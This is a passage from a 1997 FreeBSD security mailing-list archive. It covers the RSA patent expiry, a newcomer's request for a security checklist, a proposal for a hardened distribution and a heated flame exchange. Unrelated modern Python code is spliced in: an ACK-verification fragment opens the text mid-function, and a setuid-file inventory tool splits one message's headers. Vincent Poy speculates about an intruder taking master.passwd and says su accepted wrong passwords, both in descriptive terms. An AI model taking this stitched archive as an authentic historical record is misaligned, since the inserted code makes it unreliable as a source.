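    statuses = [rx.handle(recs[0])[0], rx.handle(recs[2])[0], rx.handle(recs[0])[0]]
    tampered = recs[2][:-1] + bytes([recs[2][-1] ^ 0x01])
    statuses.append(rx.handle(tampered)[0])
    ack0 = rx.handle(recs[0])[1]
    return (statuses, sorted(rx.missing),
            verify_ack(SHARED_KEY, recs[0], ack0),   # ACK bound to record 0: accepted
            verify_ack(SHARED_KEY, recs[2], ack0))   # same ACK presented for record 2: rejected
```

`demo()` returns `(["ok", "ok", "dup", "bad"], [1], True, False)`: the gap at sequence 1 is reported in `missing`, the replayed record is acknowledged but not appended to `accepted` a second time, the tampered record is dropped without an ACK, and an ACK cannot be reused for a record it was not computed over. Binding the ACK to the record's own tag is what keeps a cleanup pass honest: a sender can only mark a record delivered if the collector actually authenticated that record.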
From: Robert Watson Reply-To: Robert Watson To: dkelly@hiwaay.net cc: freebsd-security@FreeBSD.ORG Subject: Re: Commercial ssh and ssl (was Re: securelevel...) In-Reply-To: <199707300301.WAA09906@nexgen.hiwaay.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Tue, 29 Jul 1997 dkelly@hiwaay.net wrote:

> I forgot, when does the relevant RSA patent expire? Maybe we can wait until
> then. :-)

September, 2000. I wouldn't wait on this one. :)

Robert N Watson
Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/
Network Security Research, Trusted Information Systems http://www.tis.com/
Network Administrator, SafePort Network Services http://www.safeport.com/
robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/

From owner-freebsd-security Wed Jul 30 07:09:01 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA03031 for security-outgoing; Wed, 30 Jul 1997 07:09:01 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA03026 for ; Wed, 30 Jul 1997 07:08:59 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id HAA13960; Wed, 30 Jul 1997 07:08:04 -0700 (PDT) Date: Wed, 30 Jul 1997 07:08:04 -0700 (PDT)
From: Vincent Poy To: Shashi Joshi cc: Marco Molteni , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: <199707301450.JAA25877@shift-f1.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Wed, 30 Jul 1997, Shashi Joshi wrote:

=)As Marco Molteni said ->
=)
=)> Do you think one can be a newcomer as an administrator, but _has_ to know
=)> everything about security before he starts to work? Come on!
=)
=)
=)Exactly my thoughts. So, do we get a checklist or reference list from the
=)gurus?
=)
=)I am also a bit new to the sys admin duties. I have
=)taken the time to read the FreeBSD book that came with the CD (which
=)doesn't help much in the security area), read a UNIX sysadmin book (Nemeth,
=)Snyder etc the Red Book) but it too has its limitations.

I wish I had access to the FreeBSD book since I've been looking for one at different places in the Bay Area and they didn't have anything but the CD itself.

=)We don't have external user logins, so the risks are much less, but I would
=)always like to learn because soon we will be "out there".

I'm sure that in the future, people will find all sorts of ways to break into systems not via user logins but via ports or daemons.

=)Another netter mentioned that FreeBSD should ship with some documentation,
=)scripts that tell us (about the system files and directories) what are the
=)files associated with "feature" A or "service" B (e.g. uucp), which files
=)need to be setuid for what functionality.
=)
=)Here is an example. (I know you gurus will laugh, but it was my 3rd day
=)only).
=)
=)Realizing that sbin dirs are for sysadmin related files, I made the */sbin
=)as -r-xr-x--- and group being wheel or bin as appropriate.
=)Now, after a few weeks!! I realised that I am not able to send out any
=)mail.
=)I had been receiving mail like anything, my elm session also didn't
=)complain when I sent out email. Finally I checked the logs and found
=)nothing, not a trace of a mail sent out. So I checked to see `which
=)sendmail` and it was /usr/sbin/sendmail
=)So I had to give r-x permissions to it to the world.
=)
=)Now why would sendmail be in sbin when it is not purely a sysadmin tool
=)only?

Good question, but sendmail is a daemon that only root or the system should run, I guess.

=)My point? Having a document or a checklist would be real helpful to newbies
=)and can serve as a quick reference for the gurus.

Good point indeed.

I had been thinking about this hack: would it have been possible for the hacker to have run perl.003 and then snatched the master.passwd file and then cracked it? Also, about the crc check, isn't the /etc/daily script supposed to compare files and do a security check already?

Another point I want to make is that for one reason or another, 2.1.7.1R and previous versions were more strict on the password than 2.1R and 2.2.2R are. I have verified this with freshly installed boxes. On a 2.1.7.1R and older box, if you tried to su and the root password was 1234567890, you had to enter it as 1234567890 or else it won't work and say Sorry! On 2.1R, 2.2.2R and -CURRENT, I can enter 1234567890, 1234567891, 1234567892, etc. and it will still give me root access.
Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____
Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ]
GaiaNet Corporation - M & C Estate / / / / | / | __] ]
Beverly Hills, California USA 90210 / / / / / |/ / | __] ]
HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____]

From owner-freebsd-security Wed Jul 30 07:18:27 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA03509 for security-outgoing; Wed, 30 Jul 1997 07:18:27 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA03503 for ; Wed, 30 Jul 1997 07:18:25 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id KAA08313 for ; Wed, 30 Jul 1997 10:18:16 -0400 (EDT) Date: Wed, 30 Jul 1997 10:18:16 -0400 (EDT)
From: Robert Watson Reply-To: Robert Watson To: security@freebsd.org Subject: Secure FreeBSD distribution issues Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Some discussion recently (much thanks to Vinnie :) has centered on removing common security problems and unnecessary features from FreeBSD on a particular variation of installation. This would make some features optional, removing a number of unnecessary SUID programs. Additionally, turning off rcommands has been suggested, setting a default secure-level and determining which files should have immutable/append/etc flags set on them, as well as a set of guidelines for removing any other features that admins would be interested in.

Additionally, some other issues come to mind:

1. A list of setuid programs, and why each is justified; also which can be removed in various situations.

2. A kernel flag added that disables the operation of any setuid functionality (by default not listed in the kernel config file, and by default allowing setuid.) This would break much local mail delivery, password changing in non-distributed environments, uucp, and a number of other nifty things, but would be good in a distributed environment involving NFS mounts, Kerberos or NIS, and use of secure-levels. It would reimpose the rigorous "privileges can only ever be lost, never gained".

3. Work with the gid/uid issues on binding ports < 1024, allowing programs such as web servers to bind as non-root, lowering the number of situations where root access is required for a daemon. By default, at least initially, this would be off, or uid required to be 0 for all of these ports. A secure distribution might have this turned on, and a modified daemon-set?

Other ideas that might be useful in such an environment?
The goal, I think, is not to provide a completely iron-clad environment, just one where fewer privileges are required to perform operations that have previously required more privilege than desirable, and a reduced set of setuid utilities that might be unnecessary. As a possible first step, the disabling of clearly developmental setuid programs, such as suidperl, with instructions on re-enabling it in the previously mentioned document (probably just chmod u+s /usr/bin/sperl), etc.

Robert N Watson
Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/
Network Security Research, Trusted Information Systems http://www.tis.com/
Network Administrator, SafePort Network Services http://www.safeport.com/
robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/

From owner-freebsd-security Wed Jul 30 07:31:38 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA04139 for security-outgoing; Wed, 30 Jul 1997 07:31:38 -0700 (PDT) Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA04134 for ; Wed, 30 Jul 1997 07:31:36 -0700 (PDT)
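Two points in the thread call for the same small tool: Vincent's question about whether the daily script already compares files for a security check, and item 1 of Robert Watson's list above, a list of setuid programs with a justification for each. The following is added example code for this archive, not FreeBSD's /etc/security script and not code from any message in the thread. It inventories set-id regular files under a tree, diffs today's inventory against a saved baseline (the form in which a nightly report would flag a new or altered set-id binary), and reports any set-id file whose name is not on an allowlist that stands in for the "why each is justified" document. The baseline layout, the temporary demo tree, and the names in the allowlist are constructed for illustration.

```python
"""Inventory set-id files and diff against a baseline (added example)."""
import hashlib
import os
import stat
import tempfile


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def setid_inventory(root):
    """Map path -> (mode, uid, gid, sha256) for every setuid/setgid regular file under root."""
    found = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)         # lstat: never follow symlinks while walking
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue                    # only regular files honour set-id bits
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found[path] = (stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid, _sha256(path))
    return found


def diff_inventory(baseline, current):
    """(added, removed, changed) path lists, as a daily report would present them."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    changed = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return added, removed, changed


def unjustified(current, allowlist):
    """Set-id files whose basename is not on the admin's justified list."""
    return sorted(p for p in current if os.path.basename(p) not in allowlist)


def demo():
    """Build a constructed tree in a temp dir, take a baseline, then simulate a later run."""
    def names(paths):
        return [os.path.basename(p) for p in paths]

    with tempfile.TemporaryDirectory() as root:
        def mk(name, mode, data=b"#!/bin/sh\necho hello\n"):
            path = os.path.join(root, name)
            with open(path, "wb") as f:
                f.write(data)
            os.chmod(path, mode)            # set after writing: a non-root write clears set-id bits
            return path

        mk("passwd", 0o4755)                # constructed stand-ins, not real system binaries
        wall = mk("wall", 0o4555)
        mk("ls", 0o755)                     # no set-id bit: must not appear in the inventory
        baseline = setid_inventory(root)

        # What the next daily run sees: passwd's contents replaced, a new set-id
        # binary dropped in, wall stripped of its set-id bit.
        mk("passwd", 0o4755, b"#!/bin/sh\necho replaced\n")
        mk("sperl", 0o4711)
        os.chmod(wall, 0o555)
        current = setid_inventory(root)

        added, removed, changed = diff_inventory(baseline, current)
        return (sorted(names(baseline)), names(added), names(removed), names(changed),
                names(unjustified(current, {"passwd", "wall"})))
```

`demo()` returns `(["passwd", "wall"], ["sperl"], ["wall"], ["passwd"], ["sperl"])`: the baseline saw two set-id files, the later run reports `sperl` as added, `wall` as removed and `passwd` as changed (same mode, different contents), and `sperl` is the one set-id file with no entry on the justified list. The hash in the tuple is what distinguishes a replaced binary from an unchanged one; a mode-only comparison would have missed the `passwd` swap entirely.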
From: proff@suburbia.net Received: from suburbia.net (suburbia.net [198.142.2.24]) by pdx1.world.net (8.7.5/8.7.3) with SMTP id HAA01523 for ; Wed, 30 Jul 1997 07:35:52 -0700 (PDT) Received: (qmail 9190 invoked by uid 110); 30 Jul 1997 14:30:14 -0000 Message-ID: <19970730143014.9189.qmail@suburbia.net> Subject: Einstein In-Reply-To: from Vincent Poy at "Jul 30, 97 06:45:49 am" To: vince@mail.MCESTATE.COM (Vincent Poy) Date: Thu, 31 Jul 1997 00:30:14 +1000 (EST) Cc: security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

> what Jordan told me back in the FreeBSD 1.0 Gamma days. One will never
> know everything and will need to learn from others. Unless everyone is
> Albert Einstein here.
>
>
> Cheers,
> Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____

Einstein never held such an opinion.

--
Prof. Julian Assange |Little Fly, Thy Summer's Play My thoughtless hand Has
|Brush'd away. Am not I A fly like thee? Or are thou A
proff@iq.org |man like me? For I dance, And drink, and sing, Till
proff@gnu.ai.mit.edu |some blind hand Shall brush my wing. -Blake

From owner-freebsd-security Wed Jul 30 07:49:37 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA05553 for security-outgoing; Wed, 30 Jul 1997 07:49:37 -0700 (PDT) Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA05536 for ; Wed, 30 Jul 1997 07:49:32 -0700 (PDT) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id IAA04613; Wed, 30 Jul 1997 08:49:12 -0600 (MDT) Date: Wed, 30 Jul 1997 08:49:12 -0600 (MDT) Message-Id: <199707301449.IAA04613@rocky.mt.sri.com>
From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Marco Molteni Cc: Vincent Poy , security@freebsd.org, "\[Mario1-\]" Subject: Re: security hole in FreeBSD In-Reply-To: References: X-Mailer: VM 6.29 under 19.15 XEmacs Lucid Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

> There's a thing I really can't understand in all this thread.
> Nobody said:
> "Vince, we're sorry about what happened to you. Probably you did something
> stupid, but _everybody_ has to learn his lesson the hard way.
> Here you are a checklist of books, programs and ideas to follow to
> improve the security of your site."
>
> No, everybody started to flame at him! Why? Because he chose as his
> subject line: "security hole in FreeBSD" instead of "I'm a sucker
> please you security wizards help me"?

Ahh, but you assume that we haven't ever seen Vinny before. Unfortunately, his behavior is 'typical', in that he wants us to do all his research and work for him, rather than him spending the time to do his own work. He also shows a complete lack of interest in finding out solutions to his own problems.

I've dealt with him too many times over the last 2 years to have anything but pity on any company he works for, since he will require hand-holding and doesn't do anything on his own.

Nate

From owner-freebsd-security Wed Jul 30 07:55:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id HAA05995 for security-outgoing; Wed, 30 Jul 1997 07:55:07 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id HAA05988 for ; Wed, 30 Jul 1997 07:55:05 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id HAA14096; Wed, 30 Jul 1997 07:54:58 -0700 (PDT) Date: Wed, 30 Jul 1997 07:54:58 -0700 (PDT)
From: Vincent Poy
To: Nate Williams
cc: Marco Molteni, security@freebsd.org, "[Mario1-]"
Subject: Re: security hole in FreeBSD
In-Reply-To: <199707301449.IAA04613@rocky.mt.sri.com>

On Wed, 30 Jul 1997, Nate Williams wrote:

=)> There's a thing really I can't understand in all this thread.
=)> Nobody said:
=)> "Vince, we're sorry about what happened to you. Probably you did something
=)> stupid, but _everybody_ has to learn his lesson the hard way.
=)> Here you are a checklist of books, programs and ideas to follow to
=)> improve the security of your site."
=)>
=)> No, everybody started to flame at him! Why? Because he chose as his
=)> subject line: "security hole in FreeBSD" instead of "I'm a sucker
=)> please you security wizards help me" ?
=)
=)
=)Ahh, but you assume that we haven't ever seen Vinny before.
=)Unfortunately, his behavior is 'typical', in that he wants us to do all
=)his research and work for him, rather than him spending the time to do
=)his own work.  He also shows a complete lack of interest in finding out
=)solutions to his own problems.

	I have tried reading the docs and it sometimes fails so what would
you do?

=)I've dealt with him too many times over the last 2 years to have
=)anything but pity on any company he works for, since he will require
=)hand-holding and doesn't do anything on his own.

	Since when have you dealt with me too many times over the last 2
years, you have helped me exactly twice.  What works for you will not
necessarily work for everyone.  Every time all you would do is start
flaming.  Most of the people here have more resources than I would which
is $$$ since remember I don't get paid to do this sysadmin stuff and even
for the router, you are there physically, I am not so I need to verify
things before doing it as a precaution.  I don't think you or anyone else
here never asked for help from others before.


Cheers,
 Vince - vince@MCESTATE.COM - vince@GAIANET.NET            ________   __ ____
 Unix Networking Operations - FreeBSD-Real Unix for Free  / / / / |  / |[__  ]
 GaiaNet Corporation - M & C Estate                       / / / / | / | __] ]
 Beverly Hills, California USA 90210                     / / / / /|/ / | __] ]
 HongKong Stars/Gravis UltraSound Mailing Lists Admin    /_/_/_/_/|___/|_|[____]

From owner-freebsd-security Wed Jul 30 08:03:52 1997
Date: Wed, 30 Jul 1997 19:03:58 +0400 (MSD)
From: Maxim Bolotin
To: dkelly@HiWAAY.net
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Commercial ssh and ssl (was Re: securelevel...)
In-Reply-To: <199707300301.WAA09906@nexgen.hiwaay.net>

> Vincent Poy wrote:
> I forgot, when does the relevant RSA patent expire? Maybe we can wait until
> then. :-)

"Practical UNIX and Internet Security", second edition, April 1996.

p.563
This restriction is a result of the fact that the use of public-key
cryptography in the United States will be covered by patents until the
year 1997 (in the case of the Diffie-Hellman and Hellman-Merkle patents)
or the year 2000 (in the case of the RSA patent).

p.159
The RSA algorithm is covered by U.S. Patent 4,405,829 ("Cryptographic
Communications System and Method"), which was filed for on December 14,
1977; issued on September 20, 1983; and expires on September 20, 2000.
Because a description of the algorithm was published before the patent
application was filed, RSA can be used without royalty everywhere in the
world except the United States (international patent laws have different
coverage of prior disclosure and patent applicability).

p.192
Table 6-4. The Public Key Cryptography Patents.

Patent #   Title                                     Covers Invention               Date expires
4200770    Cryp. Apparatus and Meth.                 Diffie-Hellman Key exchange    April 29, 1997
4218582    Public Key Cryp. Apparatus and Method     Knapsack, and possibly all     August 19, 1997
                                                     of public key crypt.
4424414    Exponentiation crypt. Apparatus and                                      January 3, 2001
           Method
4405829    Crypt. communications System and Method   RSA encryption                 September 20, 2000

Maxim.
-
Rostov State University Computer Center
Rostov-on-Don, Russia
+7 (8632) 285794 or 357476
RUNNet, MAB1-RIPE
max@runnet.ru

From owner-freebsd-security Wed Jul 30 08:07:12 1997
Date: Wed, 30 Jul 1997 09:06:41 -0600 (MDT)
Message-Id: <199707301506.JAA04746@rocky.mt.sri.com>
From: Nate Williams
To: Vincent Poy
Cc: Nate Williams, Marco Molteni, security@freebsd.org, "[Mario1-]"
Subject: Re: security hole in FreeBSD
References: <199707301449.IAA04613@rocky.mt.sri.com>

> =)Ahh, but you assume that we haven't ever seen Vinny before.
> =)Unfortunately, his behavior is 'typical', in that he wants us to do all
> =)his research and work for him, rather than him spending the time to do
> =)his own work.  He also shows a complete lack of interest in finding out
> =)solutions to his own problems.
>
> 	I have tried reading the docs and it sometimes fails so what would
> you do?

What docs have you read?  What books have you read?

> 	Since when have you dealt with me too many times over the last 2
> years, you have helped me exactly twice.

Do you want me to drag out my archives and prove you wrong?

> flaming.  Most of the people here have more resources than I would which
> is $$$ since remember I don't get paid to do this sysadmin stuff

*SO WHAT*.  Do you think I get paid to answer you?  Do you think I've
ever got paid to do any FreeBSD hacking?  It's irrelevant.  I'm not the
person who claims he can read 500 words/minute, and who needs no
sleep at night, and who also 'must have missed all 12 emails discussing
the same problem in the mailing lists, even though I do read the lists'.

You don't learn from anything *but* your own mistakes, and then don't
try to come up with solutions, but rely on someone else to provide them
for you.

> and even
> for the router, you are there physically, I am not so I need to verify
> things before doing it as a precaution.  I don't think you or anyone else
> here never asked for help from others before.

That's because I and most of the other folks do their research *first*,
and then ask questions.  You continue to whine and complain and show a
complete lack of interest in figuring out the solution, and would
rather have someone spoon-feed you the steps in an easy to do solution

Unfortunately, there ain't 'system administration for dummies', because
a sys-ad requires a broad-base of knowledge, and you with all your
supposed talents don't take the time to do a good job.

One thing that my family has taught me is that you end up with better
jobs by going out of your way to do your current job well.  By sitting
on your duff and relying on people to tell you what to do, you'll never
get ahead in life.  I only wish you could understand this advice, and
actually apply it.


Nate

From owner-freebsd-security Wed Jul 30 08:13:52 1997
Date: Wed, 30 Jul 1997 09:13:42 -0600 (MDT)
Message-Id: <199707301513.JAA04836@rocky.mt.sri.com>
From: Nate Williams
To: Vincent Poy
Cc: Marco Molteni, security@freebsd.org, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD

> 	I know.  I mean Nate and Jordan has been in this thing for at least
> twice as long as I have.  I'm only 23 years old now.

When I turned 23, I had been minix hacking for 2-3 years.  How old do
you think Chris Demetriou (of NetBSD fame) is?  You've got lots of
excuses, but no answers.


Nate

From owner-freebsd-security Wed Jul 30 08:29:04 1997
From: Vincent Poy
To: Nate Williams
cc: Marco Molteni, security@freebsd.org, "[Mario1-]"
Subject: Re: security hole in FreeBSD
Date: Wed, 30 Jul 1997 08:28:47 -0700 (PDT)
In-Reply-To: <199707301506.JAA04746@rocky.mt.sri.com>

On Wed, 30 Jul 1997, Nate Williams wrote:

=)> =)Ahh, but you assume that we haven't ever seen Vinny before.
=)> =)Unfortunately, his behavior is 'typical', in that he wants us to do all
=)> =)his research and work for him, rather than him spending the time to do
=)> =)his own work.  He also shows a complete lack of interest in finding out
=)> =)solutions to his own problems.
=)>
=)> 	I have tried reading the docs and it sometimes fails so what would
=)> you do?
=)
=)What docs have you read?  What books have you read?

	The docs that came with the product.  As for books, I don't have
that much time to go through reading books because by the time I finish
reading it, it'll be too late.

=)> 	Since when have you dealt with me too many times over the last 2
=)> years, you have helped me exactly twice.
=)
=)Do you want me to drag out my archives and prove you wrong?
=)
=)> flaming.  Most of the people here have more resources than I would which
=)> is $$$ since remember I don't get paid to do this sysadmin stuff
=)
=)*SO WHAT*.  Do you think I get paid to answer you?  Do you think I've
=)ever got paid to do any FreeBSD hacking?  It's irrelevant.  I'm not the
=)person who claims he can read 500 words/minute, and who needs no
=)sleep at night, and who also 'must have missed all 12 emails discussing
=)the same problem in the mailing lists, even though I do read the lists'.

	I know you don't get paid to answer me but no one pointed a gun to
your head and made you answer every question I ask.  I never claimed I can
read 500 words a minute.  I did say I need no sleep at night but do
remember, I am still in school so FreeBSD isn't my only thing.
And it wouldn't be weird if I missed a whole thread since sometimes when the
owners are on vacation, the bbs machine which I have no control of crashes
and the mail backlogs on the machine I read the mailing list on crashes
too and not until 10 days later, will the machines be back up.  And
when I resubscribe again which I did at least 10-20 times just this year
alone, I would miss out on parts of the discussion.

=)You don't learn from anything *but* your own mistakes, and then don't
=)try to come up with solutions, but rely on someone else to provide them
=)for you.

	I know I wouldn't learn from anything but my own mistakes since if
certain things are not in the docs, I would need to ask.

=)> and even
=)> for the router, you are there physically, I am not so I need to verify
=)> things before doing it as a precaution.  I don't think you or anyone else
=)> here never asked for help from others before.
=)
=)That's because I and most of the other folks do their research *first*,
=)and then ask questions.  You continue to whine and complain and show a
=)complete lack of interest in figuring out the solution, and would
=)rather have someone spoon-feed you the steps in an easy to do solution

	You're still forgetting the fact that when you are physically
there next to the router machine, it's a night and day difference in
figuring things out.  But when it's like totally remote, then you do need
to verify things first instead of totally screwing it up.  Besides, for
the serial card, I asked if I had the configuration settings correct and
you did post a configuration of yours which worked but when we tried it
didn't.  And this problem was never covered in the docs.  Somehow for
whatever reason, the FreeBSD machine would not see the CSU/DSU unless
either it was power toggled on/off or we had to issue a few linkup
commands in the script.  Sorry about that one since I wasn't physically
there so I thought it might have been my misconfiguration.

=)Unfortunately, there ain't 'system administration for dummies', because
=)a sys-ad requires a broad-base of knowledge, and you with all
=)your supposed talents don't take the time to do a good job.

	I'm trying to do my best at it but the problem is there is only so
many hours per day and I can't just drop the entire project and go read
books and stuff when the book might not even cover it.

=)One thing that my family has taught me is that you end up with better
=)jobs by going out of your way to do your current job well.  By sitting
=)on your duff and relying on people to tell you what to do, you'll never
=)get ahead in life.  I only wish you could understand this advice, and
=)actually apply it.

	I'll try but with this security incident, it's different because
all three of us went into panic since if we had access to the machine now,
we would be able to at least find things.  I guess what I need to do is
find the time to start reading things but I don't know where to start
since things in the computer area become obsolete so fast these days
anyways.


Cheers,
 Vince - vince@MCESTATE.COM - vince@GAIANET.NET            ________   __ ____
 Unix Networking Operations - FreeBSD-Real Unix for Free  / / / / |  / |[__  ]
 GaiaNet Corporation - M & C Estate                       / / / / | / | __] ]
 Beverly Hills, California USA 90210                     / / / / /|/ / | __] ]
 HongKong Stars/Gravis UltraSound Mailing Lists Admin    /_/_/_/_/|___/|_|[____]

From owner-freebsd-security Wed Jul 30 08:34:12 1997
Date: Wed, 30 Jul 1997 08:33:52 -0700 (PDT)
From: Vincent Poy
To: Nate Williams
cc: Marco Molteni, security@freebsd.org, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To: <199707301513.JAA04836@rocky.mt.sri.com>

On Wed, 30 Jul 1997, Nate Williams wrote:

=)> 	I know.  I mean Nate and Jordan has been in this thing for at least
=)> twice as long as I have.  I'm only 23 years old now.
=)
=)When I turned 23, I had been minix hacking for 2-3 years.  How old do
=)you think Chris Demetriou (of NetBSD fame) is?  You've got lots of
=)excuses, but no answers.

	When you were 23 and when Chris were 23, you guys were in the
field of hacking and stuff.  I was one who learned my way around computers
without taking any classes or anything.  It's just these 2 years,
everything seemed to need more priority than it used to because hackers
are a greater risk now than they are before among other things.  I am in
the field of astrophysics and haven't learned Unix from anyone but just
myself.


Cheers,
 Vince - vince@MCESTATE.COM - vince@GAIANET.NET            ________   __ ____
 Unix Networking Operations - FreeBSD-Real Unix for Free  / / / / |  / |[__  ]
 GaiaNet Corporation - M & C Estate                       / / / / | / | __] ]
 Beverly Hills, California USA 90210                     / / / / /|/ / | __] ]
 HongKong Stars/Gravis UltraSound Mailing Lists Admin    /_/_/_/_/|___/|_|[____]

From owner-freebsd-security Wed Jul 30 09:09:51 1997
Date: Wed, 30 Jul 1997 12:09:34 -0400 (EDT)
From: zoonie
To: Vincent Poy
cc: Nate Williams, Marco Molteni, security@FreeBSD.ORG, "[Mario1-]"
Subject: Re: security hole in FreeBSD

can all of you take this off-line, it's obvious that vincent needs to do
some homework.  if we think that his questions are newbie questions then
we should just tell him to RTFM and then ignore him or we should just
answer them off this list.  if he doesn't get paid to do sysadmin stuff
for gaianet and doesn't have the time to read books on this stuff that's
his problem and i really don't want to know about it.

enough is enough....

On Wed, 30 Jul 1997, Vincent Poy wrote:

> On Wed, 30 Jul 1997, Nate Williams wrote:
>
> =)> =)Ahh, but you assume that we haven't ever seen Vinny before.
> =)> =)Unfortunately, his behavior is 'typical', in that he wants us to do all
> =)> =)his research and work for him, rather than him spending the time to do
> =)> =)his own work.  He also shows a complete lack of interest in finding out
> =)> =)solutions to his own problems.
> =)>
> =)> 	I have tried reading the docs and it sometimes fails so what would
> =)> you do?
> =)
> =)What docs have you read?  What books have you read?
>
> 	The docs that came with the product.  As for books, I don't have
> that much time to go through reading books because by the time I finish
> reading it, it'll be too late.
>
> =)> 	Since when have you dealt with me too many times over the last 2
> =)> years, you have helped me exactly twice.
> =)
> =)Do you want me to drag out my archives and prove you wrong?
> =)
> =)> flaming.  Most of the people here have more resources than I would which
> =)> is $$$ since remember I don't get paid to do this sysadmin stuff
> =)
> =)*SO WHAT*.  Do you think I get paid to answer you?  Do you think I've
> =)ever got paid to do any FreeBSD hacking?  It's irrelevant.  I'm not the
> =)person who claims he can read 500 words/minute, and who needs no
> =)sleep at night, and who also 'must have missed all 12 emails discussing
> =)the same problem in the mailing lists, even though I do read the lists'.
>
> 	I know you don't get paid to answer me but no one pointed a gun to
> your head and made you answer every question I ask.  I never claimed I can
> read 500 words a minute.  I did say I need no sleep at night but do
> remember, I am still in school so FreeBSD isn't my only thing.  And it
> wouldn't be weird if I missed a whole thread since sometimes when the
> owners are on vacation, the bbs machine which I have no control of crashes
> and the mail backlogs on the machine I read the mailing list on crashes
> too and not until 10 days later, will the machines be back up.  And
> when I resubscribe again which I did at least 10-20 times just this year
> alone, I would miss out on parts of the discussion.
>
> =)You don't learn from anything *but* your own mistakes, and then don't
> =)try to come up with solutions, but rely on someone else to provide them
> =)for you.
>
> 	I know I wouldn't learn from anything but my own mistakes since if
> certain things are not in the docs, I would need to ask.
>
> =)> and even
> =)> for the router, you are there physically, I am not so I need to verify
> =)> things before doing it as a precaution.  I don't think you or anyone else
> =)> here never asked for help from others before.
> =)
> =)That's because I and most of the other folks do their research *first*,
> =)and then ask questions.  You continue to whine and complain and show a
> =)complete lack of interest in figuring out the solution, and would
> =)rather have someone spoon-feed you the steps in an easy to do solution
>
> 	You're still forgetting the fact that when you are physically
> there next to the router machine, it's a night and day difference in
> figuring things out.  But when it's like totally remote, then you do need
> to verify things first instead of totally screwing it up.  Besides, for
> the serial card, I asked if I had the configuration settings correct and
> you did post a configuration of yours which worked but when we tried it
> didn't.  And this problem was never covered in the docs.  Somehow for
> whatever reason, the FreeBSD machine would not see the CSU/DSU unless
> either it was power toggled on/off or we had to issue a few linkup
> commands in the script.  Sorry about that one since I wasn't physically
> there so I thought it might have been my misconfiguration.
>
> =)Unfortunately, there ain't 'system administration for dummies', because
> =)a sys-ad requires a broad-base of knowledge, and you with all
> =)your supposed talents don't take the time to do a good job.
>
> 	I'm trying to do my best at it but the problem is there is only so
> many hours per day and I can't just drop the entire project and go read
> books and stuff when the book might not even cover it.
>
> =)One thing that my family has taught me is that you end up with better
> =)jobs by going out of your way to do your current job well.  By sitting
> =)on your duff and relying on people to tell you what to do, you'll never
> =)get ahead in life.  I only wish you could understand this advice, and
> =)actually apply it.
>
> 	I'll try but with this security incident, it's different because
> all three of us went into panic since if we had access to the machine now,
> we would be able to at least find things.  I guess what I need to do is
> find the time to start reading things but I don't know where to start
> since things in the computer area become obsolete so fast these days
> anyways.
>
>
> Cheers,
